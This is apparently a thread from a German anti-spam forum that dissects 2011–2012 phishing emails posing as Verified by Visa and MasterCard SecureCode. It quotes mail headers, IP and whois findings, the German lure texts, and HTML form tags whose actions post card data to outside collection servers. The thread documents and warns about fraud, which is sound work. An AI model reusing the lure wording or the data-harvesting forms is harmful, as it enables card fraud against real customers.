03: for <x>; Fri, 9 Sep 2011 xx:xx:xx +0200 (CEST)
04: X-Greylist: delayed 831 seconds by postgrey-1.32 at spamgate; Fri, 09 Sep 2011 xx:xx:xx
05: CEST
06: Received: from h1870429.stratoserver.net (ptclean.de [85.214.41.149])
07: (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
08: (No client certificate requested)
09: by x (Postfix) with ESMTPS ID: [ID filtered]
10: for <x>; Fri, 9 Sep 2011 xx:xx:xx +0200 (CEST)
Gephished wird hier whois:
[Link nur für registrierte Mitglieder sichtbar. ]/img/icons/tabs/tab.php und hier whois:
[Link nur für registrierte Mitglieder sichtbar. ]/.ssh/a.php
[html]<FORM action="http://www.80m.co.uk/img/icons/tabs/tab.php" name="PC_7_2_1661_cam10To30Form" id="PC_7_2_1661_inputForm" method="POST" AUTOCOMPLETE="off">
[...]
<FORM action="http://217.16.178.253/.ssh/a.php" name="PC_7_2_1661_cam10To30Form" id="PC_7_2_1661_inputForm" method="POST" AUTOCOMPLETE="off">[/html]
Villains who twirl their mustaches are easy to spot.
Those who cloak themselves in good deeds are well camouflaged.
lG
Ute
Mein mühsam lesbares Avatar sagt "You won't find me on Facebook". Auf allen anderen "social networks" wirst Du mich auch nicht finden. Etwas Privatsphäre muß bleiben...
Zitat von Pressemitteilung der Verbraucherzentrale Nordrhein-Westfalen
Die Verbraucherzentrale NRW warnt vor verdächtigen E-Mails, die auf Kunden der Kreditkartenunternehmen Visacard und Mastercard zielen. Die Betreffzeile dieser Phishing-E-Mails lautet "Sicherheitshinweis 3D Secure" und stammt angeblich von Arcot-Secure. Dies ist besonders tückisch, weil es tatsächlich eine Firma namens Arcot gibt, die ihren Sitz in den USA hat und mit technischen Dienstleistungen rund um das neue Sicherheitsverfahren "3D Secure" betraut ist. Tatsächlich aber kommt die E-Mail von einem Absender, der eine Webseite letzte Woche in der Ukraine angemeldet hat.
whois:
[Link nur für registrierte Mitglieder sichtbar. ] ---> KOREA TELECOM
mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.
IP: 85.158.249.66 ---> vps01.dvlmilieu.nl/IT-Ernity Internet Services BV
mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.
01: Received: from 211-20-82-138.HINET-IP.hinet.net (EHLO dns.ebm.com.tw)
02: [211.20.82.138]
03: by mx0.gmx.net (mx031) with SMTP; 10 Nov 2011 xx:xx:xx +0100
04: Received: from dns.ebm.com.tw (localhost [127.0.0.1])
05: by dns.ebm.com.tw (Postfix) with ESMTP ID: [ID filtered]
06: for xxxxx; Thu, 10 Nov 2011 xx:xx:xx +0800 (CST)
07: Received: from kreditkarte.visa-mastercard.de (unknown [62.28.57.138])
08: by dns.ebm.com.tw (Postfix) with ESMTP ID: [ID filtered]
09: for xxxxx; Thu, 10 Nov 2011 xx:xx:xx +0800 (CST)
IP: 62.28.57.138 ---> MOBBIT TMN CORPORATE TV
Mindestens seit dem 28. 10. bläst der Gangster seinen Dreck also über die IP 62.28.57.138 raus. Und dies bei einem Provider mitten in Europa. Somit kann ich für MOBBIT TMN CORPORATE TV konstatieren, dass man dort anscheinend nach dem Motto 'legal, illegal, scheissegal' arbeitet.
Auch hier wieder mit HMTL-Geraffel im Anhang, das Schadskript zum Datenversand findet man unter:
Code:
form action="http://61.235.73.254/index.php"
IP: 61.235.73.254 ---> China Railcom Guangdong
Also die chines. Eisenbahn, die als Schwarzhut ebenso eine lange Tradition hat. Oder bessert sich da ein unterbezahlter Eisenbähner nebenher noch etwas sein Salär auf?
mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.
Sie haben ein falsches passwort für Verified by Visa gegeben ist dreimal und muss daher beginne ein. Um dies zu tun, stellen sie sicher ihre daten unten. Sobald sie ihr neues passwort aktiviert ist, können sie identifizieren sich selbst und die zahlung per Karte in den von Visa-angeschlossenen Geschäfte Verified.
Verified by Visa / MasterCard SecureCode Passwort muss wegen der vielen fehlgeschlagenen logins geändert werden.
Ãnderung Passwort!
Hinter dem "Änderung Passwort"-Button liegt folgender Link: whois:
[Link nur für registrierte Mitglieder sichtbar. ]
Wurde die TU Freiberg schon informiert? Die Unis machen da recht schnell tabula rasa.
mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.
12: by smtp26.msg.oleane.net (MTA) with ESMTP ID: [ID filtered]
13: Sun, 8 Jan 2012 xx:xx:xx +0100
14: X-Oleane-Rep: REPA
15: Received: from User ([176.31.227.5]) by
16: srv-mail.emploi-lystourcoing.local with Microsoft SMTPSVC(6.0.3790.3959);
17: Sun, 8 Jan 2012 xx:xx:xx +0100
IP: 176.31.227.5 ---> ns212113.ovh.net
VerifedbyvisaVerifedbyvisa
Hallo Gast Visa Europe,
Ihre Kreditkarte wurde ausgesetzt, weil wir ein Problem
festgestellt, auf
Ihrem Konto.
Wir haben zu bestimmen,dass jemand Ihre Karte ohne Ihre Erlaubnis
verwendet
haben. Für Ihren Schutz haben wir Ihre Kreditkarte aufgehangen. Um diese
Suspension aufzuheben_*Klicken Sie hier whois:
[Link nur für registrierte Mitglieder sichtbar. ]*_
und folgen Sie den Staat zur Aktualisierung der Informationen in Ihrer
Kreditkarte.
*Vermerk:* Wenn diese nicht vollständig ist , werden wir gezwungen sein,
Ihre Karte aussetzen
Wir bedanken uns fur Ihre Zusammenarbeit in dieser Angelegenheit.
Dossier n : PP-1124-075-998
Danke,
Kunden-Support-Service.
--------------------------------------------------------------------------------
Copyright 1999-2011 VerifedbyVisa . Tous droits rйserves.
Der Kriminelle von Welt benutzt natürlich Weiterleitungen um den eigentlichen Schadserver zu schützen:
whois:
[Link nur für registrierte Mitglieder sichtbar. ]
IP: 89.110.129.55 ---> eden5.netclusive.de
mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.
Lesezeichen